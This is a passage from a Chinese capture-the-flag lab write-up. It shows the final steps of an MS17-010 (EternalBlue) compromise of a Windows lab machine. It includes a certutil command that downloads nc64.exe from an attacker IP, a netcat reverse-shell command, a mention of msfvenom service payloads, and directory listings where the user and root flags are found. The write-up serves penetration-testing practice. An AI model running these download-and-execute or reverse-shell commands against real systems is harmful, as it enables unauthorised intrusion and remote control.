service_exec(conn, r'cmd /c c:\\windows\\temp\\shell.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
拉倒,还是不行,老老实实的传nc吧:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe
--2024-08-10 07:58:22-- https://github.com/int0x33/nc.exe/blob/master/nc64.exe
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘nc64.exe’
nc64.exe [ <=> ] 285.33K 1.39MB/s in 0.2s
2024-08-10 07:58:23 (1.39 MB/s) - ‘nc64.exe’ saved [292179]
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ chmod +x *
上传,,反弹shell:
1
2
service_exec(conn, r'cmd /c certutil -urlcache -gmt -split -f http://192.168.10.104:8888/nc64.exe c:\\windows\\temp\\nc64.exe')
service_exec(conn, r'cmd /c c:\\windows\\temp\\nc64.exe -e cmd 192.168.10.104 1234')
成功!
但是pwncat-cs又不行了。。。。。
换一个:
查找flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is E4E7-1761
Directory of C:\
07/16/2016 06:18 AM <DIR> PerfLogs
04/15/2024 07:04 AM <DIR> Program Files
01/06/2017 08:09 PM <DIR> Program Files (x86)
04/15/2024 07:34 AM <DIR> Users
08/10/2024 08:11 PM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 21,073,338,368 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is E4E7-1761
Directory of C:\Users
04/15/2024 07:34 AM <DIR> .
04/15/2024 07:34 AM <DIR> ..
04/15/2024 07:04 AM <DIR> Administrator
04/15/2024 07:04 AM <DIR> Public
04/15/2024 07:34 AM <DIR> ruycr4ft
0 File(s) 0 bytes
5 Dir(s) 21,073,338,368 bytes free
C:\Users>dir /s *.txt
dir /s *.txt
Volume in drive C has no label.
Volume Serial Number is E4E7-1761
Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
04/15/2024 07:35 AM 307 ConsoleHost_history.txt
1 File(s) 307 bytes
Directory of C:\Users\Administrator\Desktop
04/15/2024 07:32 AM 76 root.txt
1 File(s) 76 bytes
Directory of C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support
08/10/2024 02:45 PM 3,767 NisLog.txt
1 File(s) 3,767 bytes
Directory of C:\Users\ruycr4ft\Desktop
04/15/2024 07:34 AM 58 user.txt
1 File(s) 58 bytes
Total Files Listed:
4 File(s) 4,208 bytes
0 Dir(s) 21,073,338,368 bytes free
C:\Users>type C:\Users\ruycr4ft\Desktop\user.txt
type C:\Users\ruycr4ft\Desktop\user.txt
HMV{XXXXXXXXXXXXXXXX}
C:\Users>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
HMV{XXXXXXXXXXXXXXXX}
参考
https://youtube.com/watch?v=9f_SOPJVFig
https://blog.zgsec.cn/archives/172.html?scroll=comment-160
https://blog.csdn.net/yyyyyybw/article/details/132741112?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-132741112-blog-120579915.235^v43^pc_blog_bottom_relevance_base5&spm=1001.2101.3001.4242.1&utm_relevant_index=3
https://www.cnblogs.com/backlion/p/7325228.html
本文由作者按照 CC BY 4.0 进行授权